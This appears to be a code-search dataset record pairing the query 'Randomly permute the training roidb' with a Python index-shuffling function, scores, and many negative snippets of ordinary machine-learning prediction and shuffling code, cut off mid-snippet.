dictionary that will be returned from the\n # view\n data = {\"success\": False}\n\n # ensure an image was properly uploaded to our endpoint\n if flask.request.method == \"POST\":\n if flask.request.files.get(\"image\"):\n # read the image in PIL formats\n img = flask.request.files[\"image\"].read()\n img = Image.open(io.BytesIO(img))\n\n # preprocess the image and prepare it for classification\n img = predictor.prepare_image(img, target_size=(299, 299), http_request=True)\n\n # classify the input image and then initialize the list\n # of predictions to return to the client\n predictions = predictor.model.predict(img)\n\n dog_label = predictor.decode_prediction(np.argmax(predictions, axis=-1)[0])\n print(dog_label)\n result = {\"label\" : str(dog_label), \"probability\" : float(np.max(predictions[0]))}\n data[\"predictions\"] = result\n\n # indicate that the request was a success\n data[\"success\"] = True\n\n # return the data dictionary as a JSON response\n return flask.jsonify(data)", "def predict(self, x):\n # *** START CODE HERE ***\n return self.clf.predict_classes(x.reshape(x.shape[0], 28, 28, 1))\n # *** END CODE HERE ***", "def predict(input):\n pf = process_input(input)\n # Reshape data to be [samples][pixels][width][height]\n pf = pf.reshape(pf.shape[0], 1, 28, 28).astype('float32')\n # Normalize inputs from 0-255 to 0-1\n pf = pf / 255\n pr = classifier.predict_classes(pf)\n # Cast the numpy array predicted values as a list.\n return list(map(lambda x: int(x), pr))", "def predict(self):\n batch = get_predict_batch(1, num_rec_out=self.num_test_rec)\n self.g_model.test_batch(\n batch, self.global_step, num_rec_out=self.num_test_rec)", "def predict(self, model, x_test):\n pass", "def predict(self, image):\n if len(image.shape) == 3:\n return self._predict_single(image)\n elif len(image.shape) == 4:\n return self._predict_batch(image)\n else:\n raise ValueError('Wrong image format.')", "def gp_predict(model, params):\n predic = model.predict(params)\n return predic[0]", "def predict(self, model, context, data):\n pass", "def pre_analyse():\n t = transform()\n model = modified_resnet50()\n model.load_state_dict(\n torch.load(\n \"model.pth.tar\",\n map_location=torch.device(\"cpu\"),\n )[\"state_dict\"]\n )\n model.eval()\n\n def get_preds(img_path):\n \"\"\"\n Gives labelds and probabilities for a single image\n This is were we preprocess the image, using a function defined in the model class\n \"\"\"\n # load image\n img = Image.open(img_path).convert(\"RGB\")\n # process it\n x = t(img)\n # get in in the right format\n x = Variable(x).unsqueeze(0)\n # predictions\n output = model(x)\n # decode\n output = decode(output.cpu().data.numpy()[0])\n\n # filter\n # return pred, proba\n return output\n\n return get_preds(\"image.jpg\")", "def predict(self, X, pred_batch_size=None):", "def predict(self):\n path = self._artifact_repo.artifact_path(self._ARTIFACT_MODEL)\n model = tf.keras.models.load_model(path)\n\n _, _, x_test, y_test = self._load_data()\n x_test = tf.keras.utils.normalize(x_test, axis=1)\n\n preds = model.predict(x_test)\n self._show_cf_matrix(np.array([np.argmax(probas) for probas in preds]), y_test)", "def prediction(input_path=INPUT_DIR,\n output_path=OUTPUT_DIR,\n model_path=MODEL_PATH,\n test=False):\n\n X = tf.placeholder(shape=[None, chunk_size, chunk_size], dtype=tf.float32, name='input_area')\n y_inter = deepcn.deepcn(X, chunk_size, False)\n y_pred = tf.cast(tf.argmax(tf.squeeze(y_inter), -1), tf.uint8)\n\n img_ids = []\n for name in os.listdir(input_path):\n if os.path.isdir(os.path.join(input_path, name)):\n img_ids.append(name)\n all_preds = np.zeros((len(img_ids), 256, 256))\n print('num of images: ', len(img_ids))\n\n loader = tf.train.Saver()\n\n with tf.Session() as sess:\n print(\"Import model from: %s\" %model_path)\n loader.restore(sess, model_path)\n # sess.run(tf.global_variables_initializer())\n\n batch_start_pos = 0\n while batch_start_pos < len(img_ids):\n batch_size = 100\n batch_end_pos = min(batch_start_pos + batch_size, len(img_ids))\n print('predict from %s, to %s' % (batch_start_pos, batch_end_pos))\n batch = img_ids[batch_start_pos:batch_end_pos]\n pw = predict_data_wrapper.PredictWrapper(path=input_path,\n resize_size=chunk_size,\n img_ids=batch)\n input_arr = pw.ResizedTestData()\n print(\"input_arr.shape: \", input_arr.shape)\n # input test_data_batch, output prediction of shape batch_size * 256 * 256\n pred_arr = sess.run(y_pred, feed_dict={X: input_arr})\n print(\"pred_arr.shape: \", pred_arr.shape)\n all_preds[batch_start_pos:batch_end_pos] = pred_arr\n pw.OutputPrediction(pred_arr*100, path=output_path)\n batch_start_pos = batch_end_pos\n\n # Use all img_ids and all_preds to generate single cell split csv file\n pw = predict_data_wrapper.PredictWrapper(path=input_path,\n resize_size=chunk_size,\n img_ids=img_ids)\n pw.GenerateSubmit(all_preds, output_path, cutoff=0.5)", "def predict(self, data):\n\n prediction = None\n if self.model is not None:\n prediction = self.model.predict(data)\n return prediction", "def predict(img, model=None, verbose=0):\n if model is None:\n from aid_funcs.keraswrapper import load_model\n model = load_model(seg_model_path, custom_objects='dice_coef_loss')\n if isinstance(img, str):\n img = load_image(img)\n if not isinstance(img, (np.ndarray, np.generic) ):\n return -1\n img = pre_process_images(img)\n else:\n img = np.reshape(img, (1, 1, im_size, im_size))\n scores = model.predict(img, verbose=verbose)\n return post_process_seg_result(scores)", "def predict(model, transforms, im_path):\r\n \r\n color_map = {'1': [180, 105, 255], # HotPink\r\n '2': [255, 0, 0], # Magenta [255, 0, 255]\r\n '3': [0, 0, 255], # red\r\n '4': [255, 0, 0]} # blue\r\n\r\n with paddle.no_grad():\r\n im = cv2.imread(im_path)\r\n im = cv2.resize(im, (512, 512))\r\n image = im.copy()\r\n im, _ = transforms(im)\r\n im = im[np.newaxis, ...]\r\n im = paddle.to_tensor(im)\r\n\r\n output = model(im)[0]\r\n output = output.numpy()\r\n output = np.argmax(output, axis=1)\r\n output = output.transpose(1,2,0).astype('uint8')\r\n output = output.squeeze()\r\n for i in range(1, 3):\r\n mask = (output == i).astype(np.bool)\r\n color_mask = np.array(color_map[str(i)], dtype=np.uint8)\r\n image[mask] = image[mask] * 0.5 + color_mask * 0.5\r\n return image", "def predict(image_path, model_path, topk=5, gpu=False):\n with torch.no_grad():\n image = process_image(image_path)\n image = torch.from_numpy(image)\n image.unsqueeze_(0)\n image = image.float()\n model, _ = checkpoint_load(model_path, gpu)\n outputs = model(image)\n probs, classes = torch.exp(outputs).topk(topk)\n probs_list = probs[0].tolist()\n classes_list = classes[0].add(1).tolist()\n return probs_list, classes_list", "def predict(self, data):\n return self.result.predict(data)", "def predict(model, X_testing):\n predictions = model.predict(X_testing)\n\n return predictions", "def predict(self, X):\n if self.model is None:\n print(\"%s.predict: implement me\" % (self.__class__.__name__))\n return np.zeros((1, self.odim))", "def predict(self, image_path, topk=5, device='cpu'):\n self.model.to(device)\n self.model.eval()\n\n image = Image.open(image_path)\n np_image = self.process_image(image)\n image.close()\n image = np_image\n\n with torch.no_grad():\n image = torch.from_numpy(image).float()\n image = image.to(device)\n # reshape image to match shapes of images used from dataloaders\n image = image.view(1, *image.shape)\n output = self.model.forward(image)\n # put output back on cpu before moving to numpy\n output = output.cpu()\n\n values, indices = torch.topk(output.data, topk)\n ps = np.atleast_1d(torch.exp(values).numpy().squeeze()).tolist()\n\n idx_to_class = {\n value: key for key, value in self.model.class_to_idx.items()\n }\n classes = [idx_to_class[i]\n for i in np.atleast_1d(indices.numpy().squeeze())]\n\n return ps, classes", "def get_prediction(\n image,\n detection_model,\n image_size: int = None,\n shift_amount: list = [0, 0],\n full_shape=None,\n postprocess: Optional[PostprocessPredictions] = None,\n verbose: int = 0,\n) -> PredictionResult:\n durations_in_seconds = dict()\n\n # read image as pil\n image_as_pil = read_image_as_pil(image)\n # get prediction\n time_start = time.time()\n detection_model.perform_inference(np.ascontiguousarray(image_as_pil), image_size=image_size)\n time_end = time.time() - time_start\n durations_in_seconds[\"prediction\"] = time_end\n\n # process prediction\n time_start = time.time()\n # works only with 1 batch\n detection_model.convert_original_predictions(\n shift_amount=shift_amount,\n full_shape=full_shape,\n )\n object_prediction_list: List[ObjectPrediction] = detection_model.object_prediction_list\n # filter out predictions with lower score\n filtered_object_prediction_list = [\n object_prediction\n for object_prediction in object_prediction_list\n if object_prediction.score.value > detection_model.confidence_threshold\n ]\n # postprocess matching predictions\n if postprocess is not None:\n filtered_object_prediction_list = postprocess(filtered_object_prediction_list)\n else:\n # init match merge instances\n postprocess = UnionMergePostprocess(match_threshold=0.9, match_metric=\"IOS\", class_agnostic=True)\n # postprocess matching predictions\n filtered_object_prediction_list = postprocess(filtered_object_prediction_list)\n\n time_end = time.time() - time_start\n durations_in_seconds[\"postprocess\"] = time_end\n\n if verbose == 1:\n print(\n \"Prediction performed in\",\n durations_in_seconds[\"prediction\"],\n \"seconds.\",\n )\n\n return PredictionResult(\n image=image, object_prediction_list=filtered_object_prediction_list, durations_in_seconds=durations_in_seconds\n )", "def predict(self):\n raise NotImplementedError", "def predict_only(self):", "def predict():\n\n\n json_payload = request.json\n #LOG.info(f\"JSON payload: %s\" %json_payload)\n inference_payload = pd.DataFrame(json_payload)\n #LOG.info(\"inference payload DataFrame: %s\" %inference_payload)\n scaled_payload = scale(inference_payload)\n prediction = list(clf.predict(scaled_payload))\n return jsonify({'prediction': prediction})", "def main(image, model_dir):\n model_file, signature = get_model_and_sig(model_dir)\n interpreter = load_model(model_dir + model_file)\n prediction = get_prediction(image, interpreter, signature)\n # get list of confidences from prediction\n confidences = list(prediction.values())[0]\n # get the label name for the predicted class\n labels = signature.get(\"classes\").get(\"Label\")\n max_confidence = max(confidences)\n prediction[\"Prediction\"] = labels[confidences.index(max_confidence)]\n return prediction", "def prediction(self, x):\n if len(x.shape)==1:\n x = np.reshape(x, (1, x.shape[0]))\n predict = self.model.predict(x)\n return predict", "def predict(self, image, visualization=False):\n image = cv2.resize(self._preprocess(image), (224, 224))\n\n start_time = millis_time()\n predictions = self.model.predict(np.array([image]))[0]\n print(\"Prediction time: {}ms\".format(millis_time() - start_time))\n\n predictions = predictions.reshape((image.shape[0], image.shape[1], 2))\n\n if visualization:\n vis = view_seg_map(image, predictions.argmax(axis=2), color=(0, 1, 0)) * 255\n\n return predictions, vis\n\n return predictions", "def get_features(model, image_filename, images_folder_path):\n\n img = image.load_img(images_folder_path + image_filename,\n target_size=(224, 224))\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n return model.predict(x).reshape(-1)", "def predict_on_image(image, model, threshold=0.3):\n model.eval()\n _, h, w = image.shape\n image = image[None, ...] # batch_size of 1\n with torch.no_grad():\n output = model(image)\n preds, maxvals = get_max_preds(output.cpu().numpy())\n preds, maxvals = preds[0], maxvals[0] # because batch_size of 1\n # Times by 4, because output map resolution is decreased by\n # a factor of with respect to input image\n preds = preds * 4\n\n for i, maxval in enumerate(maxvals):\n if maxval < threshold:\n preds[i] = [0, 0]\n\n return preds.tolist()", "def predict(cls, input):\n clf = cls.get_model()\n return clf.predict(input)", "def predict(self, inputs):\n return self.model.predict(inputs)", "def predict(self, x):\n if self.training:\n self.eval()\n\n with torch.no_grad():\n output = self.forward(x)\n\n if self.classes > 1:\n probs = torch.softmax(output, dim=1)\n else:\n probs = torch.sigmoid(output)\n\n probs = probs.squeeze(0)\n tf = transforms.Compose(\n [\n transforms.ToPILImage(),\n transforms.Resize(x.size[1]),\n transforms.ToTensor()\n ]\n )\n full_mask = tf(probs.cpu()) \n\n return full_mask", "def predict(self, src): # real signature unknown; restored from __doc__\n pass", "def predict_from(self, inputs, to_layers):", "def predict(self):\n self.kf.predict()\n self.nb_kf_pred += 1\n if self.time_since_update > 0:\n self.hit_streak = 0\n self.time_since_update += 1\n self.history.append(self.kf.x[:2].reshape(-1))\n return self.history[-1]", "def predict_for_frame(model, cv_img):\n faces = crop_faces([cv_img], only_one=False, using_bundled_library=True)[0]\n\n if len(faces) == 0:\n return []\n\n pre_processing = transforms.Compose([\n transforms.Grayscale(num_output_channels=1),\n transforms.Resize(tuple(config[\"resolution\"])),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.5], std=[0.5]),\n ])\n\n pre_processed_faces = []\n faces_coords = []\n for face in faces:\n (x, y, w, h) = face\n face_cv = crop_cv_img(cv_img, x, y, w, h)\n face_pil = pre_processing(pl.Image.fromarray(face_cv))\n pre_processed_faces.append(face_pil)\n faces_coords.append((x, y, w, h))\n\n x = torch.stack(pre_processed_faces)\n predictions = torch.nn.Softmax(dim=1)(model.forward(x))\n\n output = []\n\n for prediction, coords in zip(predictions, faces_coords):\n output.append({\n \"prediction\": prediction,\n \"position\": coords\n })\n\n return output", "def predict(self, x, **kwargs):\n kwargs = self.filter_sk_params(Sequential.predict, kwargs)\n return np.squeeze(self.model.predict(x, **kwargs))", "def getEncode(self, img):\n img_ = self.preprocess(img)\n fv = self.model_.predict(img_)\n fv = fv.reshape(-1, 1)\n return fv", "def image_model_predict(input_ms_image_filename, input_pan_image_filename, pan_img_height_size, pan_img_width_size, \r\n fitted_model, write, output_filename):\r\n \r\n with rasterio.open(input_ms_image_filename) as f:\r\n metadata = f.profile\r\n ms_img = np.transpose(f.read(tuple(np.arange(metadata['count']) + 1)), [1, 2, 0])\r\n \r\n with rasterio.open(input_pan_image_filename) as g:\r\n metadata_pan = g.profile\r\n pan_img = g.read(1)\r\n \r\n pan_img = np.expand_dims(pan_img, axis = 2)\r\n \r\n ms_to_pan_ratio = metadata['transform'][0] / metadata_pan['transform'][0]\r\n \r\n class_layer = np.zeros((pan_img.shape[0], pan_img.shape[1]))\r\n \r\n img_pan_holder = []\r\n img_ms_holder = []\r\n \r\n for i in range(0, pan_img.shape[0] - pan_img_height_size, int(ms_to_pan_ratio)):\r\n for j in range(0, pan_img.shape[1] - pan_img_width_size, int(ms_to_pan_ratio)):\r\n img_pan_iter = pan_img[i : i + pan_img_height_size, j : j + pan_img_width_size, 0]\r\n img_pan_holder.append(img_pan_iter)\r\n \r\n for i in range(0, int(ms_img.shape[0] - (pan_img_height_size / ms_to_pan_ratio)), int(ms_to_pan_ratio)):\r\n for j in range(0, int(pan_img.shape[1] - (pan_img_width_size / ms_to_pan_ratio)), int(ms_to_pan_ratio)):\r\n img_ms_iter = ms_img[i : int(i + (pan_img_height_size / ms_to_pan_ratio)), \r\n j : int(j + (pan_img_width_size / ms_to_pan_ratio)), \r\n 0 : metadata['count']]\r\n img_ms_holder.append(img_ms_iter)\r\n \r\n img_pan_array = np.concatenate(img_pan_holder, axis = 0)\r\n img_ms_array = np.concatenate(img_ms_holder, axis = 0)\r\n \r\n pred_array = np.argmax(fitted_model.predict([img_ms_array, img_pan_array]), axis = 1)\r\n \r\n n = 0 \r\n for i in range(int(pan_img_height_size / 2), pan_img.shape[0] - int(pan_img_height_size / 2), int(ms_to_pan_ratio)):\r\n for j in range(int(pan_img_width_size / 2), pan_img.shape[1] - int(pan_img_width_size / 2), int(ms_to_pan_ratio)):\r\n class_layer[i, j] = pred_array[n]\r\n n += 1\r\n \r\n if write:\r\n with rasterio.open(output_filename, 'w', **metadata_pan) as dst:\r\n dst.write(class_layer)\r\n \r\n return class_layer", "def predict(self, X):", "def predict(self, X):" ]
[ "0.8407046", "0.82272613", "0.8150348", "0.8089915", "0.804863", "0.804863", "0.78832704", "0.7876628", "0.7739453", "0.7739021", "0.77017534", "0.769704", "0.76113904", "0.7572362", "0.75003004", "0.7484886", "0.74482", "0.7415542", "0.7312185", "0.72863543", "0.728227", "0.7186036", "0.7183744", "0.71819735", "0.71651584", "0.7157286", "0.7147795", "0.7130362", "0.71273696", "0.7103107", "0.70952296", "0.70930076", "0.707336", "0.70166326", "0.70130247", "0.70019895", "0.69976425", "0.6985232", "0.6978961", "0.6975404", "0.695443", "0.6951583", "0.6914942", "0.69068956", "0.68974113", "0.68873835", "0.68782645", "0.6872228", "0.6857078", "0.685447", "0.68439883", "0.6822967", "0.6816181", "0.68135", "0.68127185", "0.6806271", "0.6805537", "0.6799206", "0.6783108", "0.6782456", "0.6776867", "0.67731166", "0.67688274", "0.6761066", "0.67569786", "0.67566484", "0.67508674", "0.6744044", "0.67389715", "0.67289984", "0.6724189", "0.67202467", "0.6715214", "0.669948", "0.66975", "0.6695025", "0.66850877", "0.6683235", "0.66819316", "0.6681296", "0.6676647", "0.6667517", "0.6663395", "0.6661073", "0.6655027", "0.66548413", "0.6654551", "0.6644024", "0.6643107", "0.66396534", "0.66310424", "0.66296244", "0.66175735", "0.6613507", "0.66099685", "0.660587", "0.66036975", "0.6603108", "0.65988654", "0.65988654" ]
0.7862426
8
Randomly permute the training roidb.
def _shuffle_roidb_idx(self): self.perm = np.random.permutation(np.arange(self.num_images)) self.cur = 0
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _random_permutation(self):\n self.train_permutation = numpy.random.permutation(range(len(self.train_list)))", "def shuffle(self, random_state=None): \n if random_state is None:\n random_state = self.random_state\n perm_ids = random_state.permutation(self.n_examples)\n self.u = self.u[perm_ids]\n self.v = self.v[perm_ids]\n self.rating = self.rating[perm_ids]", "def shuffle(self):\n self.train_nodes = np.random.permutation(self.train_nodes)\n self.batch_num = 0", "def shuffle(self):\n self.train_nodes = np.random.permutation(self.train_nodes)\n self.batch_num = 0", "def _shuffle_roidb_inds(self):\n self._perm = np.random.permutation(np.arange(len(self._roidb)))\n self._cur = 0", "def permute(self):\n raise NotImplementedError()", "def _shuffle_roidb_inds(self):\n ## 设置cur来指向现在访问的长度\n self._perm = np.random.permutation(np.arange(len(self._roidb)))\n self._cur = 0", "def scramble(self):\n\t\tfor key in self.activations.keys():\n\t\t\tself.weights[key] = r.randint(0, 1)", "def scramble(self):\n\t\tfor key in self.activations.keys():\n\t\t\tself.weights[key] = r.randint(0, 1)", "def permutation(self):\n perm = np.random.permutation(self.n_samples)\n self.data = self.data.iloc[perm]\n self.labels = self.labels.iloc[perm]\n self.labels_onehot = self.labels_onehot.iloc[perm]\n self.df_perm = self.df_perm.iloc[perm]", "def shuffle(self):\n self.train_edges = np.random.permutation(self.train_edges)\n self.nodes = np.random.permutation(self.nodes)\n self.batch_num = 0", "def shuffle(self):\n perm = self.rng.permutation(self.inputs.shape[0])\n self._current_order = self._current_order[perm]\n self.inputs = self.inputs[perm]\n self.targets = self.targets[perm]\n self.target_ids = self.target_ids[perm]", "def shuffle_train(self):\r\n if self.data_container.task == 'Classify':\r\n id_train_list=[]\r\n for i in self.idx_train_list:\r\n id_train_list.append(self._random_state.choice(i,self.train_parms[0]))\r\n for j in self._random_state.choice(self.unique_value, self.train_parms[1]):\r\n id_train_list.append(self._random_state.choice(self.idx_train_list[j],1))\r\n self.idx['train'] = np.concatenate(id_train_list, axis=0)\r\n \r\n self.idx['train'] = self._random_state.permutation(self.idx['train'])", "def shuffle(self):\n perm = self.rng.permutation(self.inputs.shape[0])\n self._current_order = self._current_order[perm]\n self.inputs = self.inputs[perm]\n self.targets = self.targets[perm]", "def _shuffle(self, r, idx_to_shuffle = None):\n n_features = r.shape[0]\n n_trials = r.shape[1]\n r_sh = r\n if idx_to_shuffle is None:\n idx_to_shuffle = range(n_features)\n for i in range(n_features):\n if i in idx_to_shuffle:\n r_sh[i,:] = r[i,random.permutation(range(n_trials))]\n return r_sh", "def mute(individual):\n mutatePt=random.randint(0,len(individual)-1)\n if mutatePt==0:\n individual[mutatePt]=random.uniform(kNN.features_min[0], kNN.features_max[0])\n elif mutatePt==2:\n individual[mutatePt]=random.uniform(kNN.features_min[1], kNN.features_max[1])\n elif mutatePt==3:\n individual[mutatePt]=random.uniform(kNN.features_min[2], kNN.features_max[2])\n elif mutatePt==4:\n individual[mutatePt]=random.uniform(kNN.features_min[3], kNN.features_max[3])\n elif mutatePt==5:\n individual[mutatePt]=random.uniform(kNN.features_min[4], kNN.features_max[4])\n\n return individual,", "def shuffle(self):\n self.x['train'], self.y['train'] = self._shuffle(\n self.x['train'],\n self.y['train']\n )", "def shuffle_opacities(mutated_genome):\n mutated_genome", "def reset(self):\n newPerm = randomUtils.randomPermutation(self.xArray.tolist(),self)\n self.pot = np.asarray(newPerm)", "def shuffle(self, random_seed: int = 0):\n # shuffle feature model clauses (used for div. promotion)\n random.seed(random_seed)\n clauses_ = []\n for clause in self.clauses_raw:\n clause_ = random.sample(clause, len(clause))\n clauses_.append(clause_)\n clauses = random.sample(clauses_, len(clauses_))\n \n self.clauses, self.target = FeatureModel.__convert_dimacs_to_bitvec(clauses, len(self.feature_dict))", "def shuffle(self):\n self.edges = np.random.permutation(self.edges)\n self.batch_num = 0", "def randomize(data):\r\n permutation = np.random.permutation(data.shape[0])\r\n shuffled_data = data[permutation, :]\r\n # shuffled_y = y[permutation]\r\n return shuffled_data", "def __permute(l,opts):\n MAX_RAND_SIZE = 2080 \n if (len(l)/3 < MAX_RAND_SIZE): \n rd.shuffle(l)\n else:\n sys.stderr.write(\\\n\t\t\"{}:{}: Valid Random Permutation Range Exceeded.\"\\\n\t\t.format(opts.progname,permute.__name__))\n opts.perror+=1", "def permute_network_tuple(self):\n\n net_tuple = self.read_nodestate(0)\n cs_prng = random.SystemRandom()\n\n network_list = list(net_tuple)\n cs_prng.shuffle(network_list)\n new_network_tuple = tuple(network_list)\n\n self.write_nodestate(nodeState, 0, new_network_tuple)", "def random():\n np.random.seed(1939)", "def randomize(self):\n self.weights = np.random.rand(*self.weights.shape) - 0.5", "def shuffle_data(self):\n images = list(self.train_images)\n labels = list(self.train_labels)\n self.train_images = []\n self.train_labels = []\n\n # create list of permutated index and shuffle data accoding to list\n idx = np.random.permutation(len(labels))\n for i in idx:\n self.train_images.append(images[i])\n self.train_labels.append(labels[i])", "def random():\n np.random.seed(0)", "def clone_rand(self):", "def shuffle(self):\n\t\t\trandom.seed(231)\n\t\t\trandom.shuffle(self.Ind)\n\t\t\tself.Ind = self.Ind[:int(len(self.Ind)/5)*5].reshape((self.cv_iters, -1))\n\t\t\t#index of valication set\n\t\t\tself.CVindex = 1\n\t\t\tself.Testindex = 0", "def shuffle(self, random_state=None):\n if random_state is not None:\n self.df = self.df.sample(frac=1, random_state=random_state)\n else:\n self.df = self.df.sample(frac=1)", "def test_permutation(self):\r\n rng_R = random_state_type()\r\n post_r, out = permutation(rng_R, size=(9,), n=6)\r\n print 'OUT NDIM', out.ndim\r\n f = compile.function(\r\n [compile.In(rng_R,\r\n value=numpy.random.RandomState(utt.fetch_seed()),\r\n update=post_r, mutable=True)],\r\n [out], accept_inplace=True)\r\n\r\n numpy_rng = numpy.random.RandomState(utt.fetch_seed())\r\n # Check over two calls to see if the random state is correctly updated.\r\n # numpy_rng.permutation outputs one vector at a time,\r\n # so we call it iteratively to generate all the samples.\r\n val0 = f()\r\n val1 = f()\r\n numpy_val0 = numpy.asarray([numpy_rng.permutation(6)\r\n for i in range(9)])\r\n numpy_val1 = numpy.asarray([numpy_rng.permutation(6)\r\n for i in range(9)])\r\n print val0\r\n print numpy_val0\r\n print val1\r\n print numpy_val1\r\n self.assertTrue(numpy.all(val0 == numpy_val0))\r\n self.assertTrue(numpy.all(val1 == numpy_val1))", "def shuffle_1d_nb(a, seed=None):\n if seed is not None:\n np.random.seed(seed)\n return np.random.permutation(a)", "def experiment4():\n np.random.seed()\n state['result'] = np.random.rand(1)", "def _mutate(self,arr,p_mut):\n mut = np.random.random_sample(arr.shape)<p_mut\n no_mut = ~mut\n mut_val = np.random.uniform(low=self.minval,high=self.maxval,size=arr.shape)\n return (no_mut*arr) + (mut*mut_val)", "def totem_random():\n random_head()\n random_head()\n random_head()", "def permutation(random_state, size=None, n=1, ndim=None, dtype='int64'):\r\n ndim, size, bcast = _infer_ndim_bcast(ndim, size)\r\n #print \"NDIM\", ndim, size\r\n op = RandomFunction(permutation_helper,\r\n tensor.TensorType(dtype=dtype, broadcastable=bcast + (False,)),\r\n ndim_added=1)\r\n return op(random_state, size, n)", "def bit_flip_mutation(random, candidate, args):\r\n rate = args.setdefault('mutation_rate', 0.1)\r\n mutant = copy.copy(candidate)\r\n if len(mutant) == len([x for x in mutant if x in [0, 1]]):\r\n for i, m in enumerate(mutant):\r\n if random.random() < rate:\r\n mutant[i] = (m + 1) % 2\r\n return mutant", "def shuffle(self):\n for i in range(10):\n random.shuffle(self.set)", "def shuffle(self):\n new_X = np.empty(self.X_data.shape, dtype=self.X_data.dtype)\n new_Y = np.empty(self.Y_data.shape, dtype=self.Y_data.dtype)\n perm = np.random.permutation(self.X_data.shape[0])\n for old_idx, new_idx in enumerate(perm):\n new_X[new_idx] = self.X_data[old_idx]\n new_Y[new_idx] = self.Y_data[old_idx]\n self.X_data = new_X\n self.Y_data = new_Y", "def shuffle(lol, seed):\n for l in lol:\n random.seed(seed)\n random.shuffle(l)", "def shuffle(self):\n x = len(self.org)\n result = self.org[:]\n var = x\n for i in range(x):\n id = random.randrange(0, var)\n result[id], result[var - 1] = result[var - 1], result[id]\n var -= 1\n\n return result", "def pepper(self, prob=0.08):\n h, w, c = self.img.shape\n for i in range(h):\n for j in range(w):\n if random() < prob:\n self.img[i, j] = 0\n\n self.edits.append(f\"pepper:{prob}\")\n return self", "def permute_table(dtable):\n shuffle_field(dtable, 'gene')\n shuffle_field(dtable, 'sample')\n shuffle_field(dtable, 'Normalized')\n if 'Filler' in dtable:\n del dtable['Filler']", "def shuffle_pass(cls, p):\n password = ''.join(random.sample(p, len(p)))\n print(f\"Generated password is:{password}\")\n pyperclip.copy(password)\n print(f\"Your {len(password)} Digit Password is copied to clipboard!\")", "def make_repeatable():\n random.seed(1234)\n np.random.seed(1234)", "def random_rotate(self):\r\n rotation = rand.randrange(0, 4, 1) # 0, 1, 2, 3\r\n flip = rand.randrange(0, 2, 1) # 0, 1\r\n new_seed = copy.deepcopy(self)\r\n # rotate by 90 degrees * rotation (0, 90, 180 270)\r\n new_seed.cells = np.rot90(new_seed.cells, rotation) \r\n if (flip == 1):\r\n # flip upside down\r\n new_seed.cells = np.flipud(new_seed.cells)\r\n new_seed.xspan = new_seed.cells.shape[0]\r\n new_seed.yspan = new_seed.cells.shape[1]\r\n return new_seed", "def random_reset_mutation(random, candidate, args):\r\n bounder = args['_ec'].bounder\r\n try:\r\n values = bounder.values\r\n except AttributeError:\r\n values = None\r\n if values is not None:\r\n rate = args.setdefault('mutation_rate', 0.1)\r\n mutant = copy.copy(candidate)\r\n for i, m in enumerate(mutant):\r\n if random.random() < rate:\r\n mutant[i] = random.choice(values)\r\n return mutant\r\n else:\r\n return candidate", "def test_random_permute_inverse_changes_group(self):\n # reproducible arbitrariness\n np.random.seed(232)\n\n nchan = 3\n nsteps = 20\n rho = 1.0/4\n target = np.random.randn(nchan, nsteps)\n\n controller = LinearController(self.G, target, tau=None)\n\n controller.set_random_permute_inverse(rho)\n self.assertIsNotNone(controller.permute_inverse)\n\n n_per_group = self.N/nchan\n groups0 = np.arange(self.N)/n_per_group\n groups1 = controller.permute_inverse/n_per_group\n\n # check that the right fraction of assignments are kept intact\n self.assertEqual(np.sum(groups0 != groups1), rho*self.N)", "def calc_granger_shuffle(self):\n if not hasattr(self, 'input_data'):\n self.preprocess_and_check_stationarity()\n temp_series = [np.stack([np.random.permutation(x)\n for x in self.input_data.T]).T\n for i in trange(self.n_shuffles)]\n\n outs_temp = parallelize(self.calc_granger, temp_series, n_jobs=30)\n outs_temp = [x[0] for x in outs_temp]\n self.shuffle_outs = np.array(outs_temp)", "def shuffle_nb(a, seed=None):\n if seed is not None:\n np.random.seed(seed)\n out = np.empty_like(a, dtype=a.dtype)\n\n for col in range(a.shape[1]):\n out[:, col] = np.random.permutation(a[:, col])\n return out", "def shuffle_T(self):\n np.random.shuffle(self.T)", "def shuffle_points(mutated_genome,index):\n random.shuffle(mutated_genome[index][2])", "def Randomize(seed=None):\n random.seed()", "def _shuffle_roidb_inds(self):\r\n if True: #cfg.TRAIN.ASPECT_GROUPING:\r\n widths = np.array([r['width'] for r in self._roidb])\r\n heights = np.array([r['height'] for r in self._roidb])\r\n horz = (widths >= heights)\r\n vert = np.logical_not(horz)\r\n horz_inds = np.where(horz)[0]\r\n vert_inds = np.where(vert)[0]\r\n\r\n horz_inds = np.random.permutation(horz_inds)\r\n vert_inds = np.random.permutation(vert_inds)\r\n mb = 2 #cfg.TRAIN.IMS_PER_BATCH\r\n horz_inds = horz_inds[:(len(horz_inds) // mb) * mb]\r\n vert_inds = vert_inds[:(len(vert_inds) // mb) * mb]\r\n inds = np.hstack((horz_inds, vert_inds))\r\n\r\n inds = np.reshape(inds, (-1, mb))\r\n row_perm = np.random.permutation(np.arange(inds.shape[0]))\r\n inds = np.reshape(inds[row_perm, :], (-1, ))\r\n self._perm = inds\r\n else:\r\n self._perm = np.random.permutation(np.arange(len(self._roidb)))\r\n self._perm = deque(self._perm)\r\n self._cur = 0", "def sample_bernoulli(self, probabilities):\n return tf.nn.relu(tf.sign(probabilities - tf.random.uniform(probabilities.shape)))", "def randomize(self):\n #first take care of all parameters (from N(0,1))\n x = self._get_params_transformed()\n x = np.random.randn(x.size)\n self._set_params_transformed(x)\n #now draw from prior where possible\n x = self._get_params()\n [np.put(x,i,p.rvs(1)) for i,p in enumerate(self.priors) if not p is None]\n self._set_params(x)\n self._set_params_transformed(self._get_params_transformed())#makes sure all of the tied parameters get the same init (since there's only one prior object...)", "def shuffle(self):\n sampling_index = np.random.randint(0, self.total_negative_samples, self.neg_paths_per_epoch)\n self.neg_paths_sampled = np.reshape(self.neg_paths[:, sampling_index , :], (-1, self.max_length))\n self.neg_paths_words_sampled = np.reshape(self.neg_paths_words[:, sampling_index, :], (-1, self.max_length))\n if self.schema != 'default':\n self.neg_paths_rel1_sampled = np.reshape(self.neg_paths_rel1[:, sampling_index, :],(-1, self.max_length))\n self.neg_paths_rel2_sampled = np.reshape(self.neg_paths_rel2[:, sampling_index, :],(-1, self.max_length))\n self.neg_paths_rel3_sampled = np.reshape(self.neg_paths_rel3[:, sampling_index, :],(-1, self.max_length))\n self.neg_paths_rel4_sampled = np.reshape(self.neg_paths_rel4[:, sampling_index, :],(-1, self.max_length))\n\n self.questions_shuffled, 